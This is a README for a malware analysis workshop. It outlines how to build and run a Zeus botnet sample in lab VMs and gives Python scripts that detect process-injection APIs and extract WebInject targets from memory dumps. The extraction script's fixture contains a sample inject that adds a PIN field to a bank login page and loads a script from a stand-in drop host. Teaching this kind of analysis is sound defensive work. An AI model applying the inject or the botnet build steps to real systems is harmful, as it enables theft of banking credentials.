conand / dissecting-malware-101

Malware Analysis Workshop


Dissecting Malware 101

Practical workshop on malware analysis.

How do you analyze malware? Let's build a sample first... and then analyze it!

Build a Custom Zeus Botnet

  • Download and import the VirtualBox VMs
  • Run scripts/enable-network.sh to allow the bot VM to reach the Internet
  • Download the Zeus builder
  • Configure the sample (config.txt and webinject.txt)
  • Build the sample
  • Upload bot.exe and config.bin to the C&C server (/var/www/ccserver)
  • Infect the VM

Static Analysis

  • Run file and strings on bot.exe
  • Disassemble bot.exe
  • Look for code injection techniques:
    • (Hint) CreateRemoteThread, and the calls that usually precede it: OpenProcess, VirtualAllocEx, WriteProcessMemory

More on code injection: injectopi
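As an added example, not part of the workshop material: the strings step above, done in Python so the result can be scored rather than eyeballed. It pulls ASCII and UTF-16LE strings from a file the way `strings` and `strings -e l` do, looks for injection-related API names as whole identifiers (so OpenProcessToken is not mistaken for OpenProcess), and reports which classic injection call chain is complete: the CreateRemoteThread one the hint points at, plus a few others. The SAMPLE bytes are a constructed import-table-like fragment, not bot.exe; run it on the real binary with `open("bot.exe", "rb").read()`.

```python
import re

# Win32/Nt APIs grouped by the injection chain an analyst expects to see them in.
INJECTION_CHAINS = {
    "CreateRemoteThread injection": {
        "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    },
    "NtCreateThreadEx injection": {
        "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "NtCreateThreadEx",
    },
    "APC injection": {
        "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "QueueUserAPC",
    },
    "Thread context hijacking": {
        "SuspendThread", "GetThreadContext", "SetThreadContext", "ResumeThread",
    },
}
INJECTION_APIS = set().union(*INJECTION_CHAINS.values())

# Printable runs of 4+ characters: ASCII (what `strings` prints) and
# UTF-16LE (what `strings -e l` prints).
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
TOKEN_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# Constructed sample: a fragment shaped like a PE import-name table plus one
# UTF-16LE registry path. It is not a real bot.exe.
SAMPLE = (
    b"\x00\x00KERNEL32.dll\x00"
    b"\x00\x00OpenProcess\x00"
    b"\x00\x00VirtualAllocEx\x00"
    b"\x00\x00WriteProcessMemory\x00"
    b"\x00\x00CreateRemoteThread\x00"
    b"\x00\x00OpenProcessToken\x00"
    b"\x00\x00GetProcAddress\x00"
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16le")
    + b"\x00\x00"
)


def extract_strings(data):
    """Return (offset, text, encoding) for every printable run, like `strings`."""
    found = [(m.start(), m.group().decode("ascii"), "ascii")
             for m in ASCII_RE.finditer(data)]
    found += [(m.start(), m.group().decode("utf-16le"), "utf-16le")
              for m in UTF16_RE.finditer(data)]
    return sorted(found)


def find_injection_apis(data):
    """Map each injection-related API name to the offsets where it occurs as a
    whole identifier, so OpenProcessToken is not counted as OpenProcess."""
    hits = {}
    for offset, text, _encoding in extract_strings(data):
        for token in TOKEN_RE.findall(text):
            if token in INJECTION_APIS:
                hits.setdefault(token, []).append(offset)
    return hits


def detect_chains(data):
    """Names of the injection chains whose API set is completely present."""
    present = set(find_injection_apis(data))
    return sorted(name for name, apis in INJECTION_CHAINS.items() if apis <= present)


if __name__ == "__main__":
    for offset, text, encoding in extract_strings(SAMPLE):
        print(f"{offset:#08x} {encoding:8} {text}")
    print("injection APIs:", find_injection_apis(SAMPLE))
    print("complete chains:", detect_chains(SAMPLE))
```

Two caveats when reading the output: an import name is a lead, not proof (plenty of legitimate software imports WriteProcessMemory), and a packed sample that resolves its APIs through GetProcAddress at run time shows none of these names on disk. In that case run the same scan over the memory dump taken during the dynamic-analysis step, where the unpacked code is visible.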

Dynamic Analysis

  • Install and set up Cuckoo
  • Analyze bot.exe
  • Inspect Cuckoo's report
  • Dump the memory
  • Inspect the memory dump
  • Analyze the network traffic (C&C check-in, config.bin download)

Extracting WebInject Targets

Automate the extraction of the WebInject targets from a given sample.

  • Develop a Cuckoo analysis package
  • Execute the sample
  • Open the browser
    • The interesting data (the WebInject rules) ends up in the browser's address space, not only in bot.exe's!
  • Dump the browser's memory
  • Look for interesting stuff! ;-)
  • Automate the extraction (a Volatility plugin?)
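As an added example, not the workshop's own code: a first cut at the automated extraction, a Python script that scans a raw memory dump for WebInject targets. It assumes the rules show up in the dump in the plain-text webinjects.txt syntax the Zeus builder consumes (`set_url <mask> <flags>`, then data_before / data_inject / data_after blocks each closed by data_end); if your sample keeps them in a different layout, the second, format-independent pass, which carves any wildcard URL mask out of ASCII and UTF-16LE strings, still applies. The dump bytes, host names and file names are constructed for the demo.

```python
import re

# Constructed memory-dump fragment, not a real dump: a rule set in the
# webinjects.txt syntax sitting between junk bytes, plus one UTF-16LE URL mask.
SAMPLE_DUMP = (
    b"\x00" * 24
    + b"set_url https://www.bank.example/login* GP\r\n"
      b"data_before\r\n"
      b"<input type=\"password\"*>\r\n"
      b"data_end\r\n"
      b"data_inject\r\n"
      b"<input name=\"pin\" type=\"text\">\r\n"
      b"<script src=\"//drop.example/k.js\"></script>\r\n"
      b"data_end\r\n"
      b"data_after\r\n"
      b"data_end\r\n"
      b"set_url https://*.webmail.example/* G\r\n"
      b"data_before\r\ndata_end\r\n"
      b"data_inject\r\ndata_end\r\n"
      b"data_after\r\ndata_end\r\n"
    + b"\xff" * 24
    + "https://online.broker.example/*".encode("utf-16le")
    + b"\x00" * 24
)

SECTIONS = {"data_before": "before", "data_inject": "inject", "data_after": "after"}
ASCII_RE = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
# A URL mask: starts with http(s):// or a wildcard, then URL characters.
MASK_RE = re.compile(r"(?:https?://|\*)[A-Za-z0-9.\-_/*?=&%~:]+")


def parse_webinjects(text):
    """Parse rules in webinjects.txt syntax: `set_url <mask> <flags>` followed by
    data_before / data_inject / data_after blocks, each closed by data_end."""
    rules, rule, section, buf = [], None, None, []
    for raw in re.split(r"\r?\n", text):
        line = raw.strip("\x00").rstrip()   # junk bytes may precede the first line
        if section is not None:
            if line == "data_end":
                rule[section] = "\n".join(buf)
                section, buf = None, []
            else:
                buf.append(line)
        elif line.startswith("set_url "):
            parts = line.split()
            rule = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                    "before": "", "inject": "", "after": ""}
            rules.append(rule)
        elif rule is not None and line in SECTIONS:
            section = SECTIONS[line]
    return rules


def carve_url_masks(data):
    """Format-independent pass: every URL-looking string carrying a '*' wildcard,
    taken from both ASCII and UTF-16LE runs in the dump."""
    strings = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    strings += [m.group().decode("utf-16le") for m in UTF16_RE.finditer(data)]
    masks = set()
    for s in strings:
        for mask in MASK_RE.findall(s):
            if "*" in mask and "." in mask:
                masks.add(mask)
    return sorted(masks)


def extract_targets(dump):
    """Run both passes over raw dump bytes: parsed rules (with the injected HTML)
    and the bare URL masks."""
    return {"rules": parse_webinjects(dump.decode("latin-1")),
            "masks": carve_url_masks(dump)}


if __name__ == "__main__":
    result = extract_targets(SAMPLE_DUMP)
    for rule in result["rules"]:
        print(f"{rule['url']}  flags={rule['flags']}  inject={len(rule['inject'])} chars")
    print("carved masks:", result["masks"])
```

The flags field is kept as-is (GP selects GET and POST requests in Zeus rules) rather than interpreted, and the injected HTML is preserved so the drop-site URLs inside data_inject blocks can be pulled out as well. Pointing `extract_targets` at the browser process's memory regions instead of a flat file is what a Volatility plugin built on top of this would do.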

License: GNU General Public License v3.0
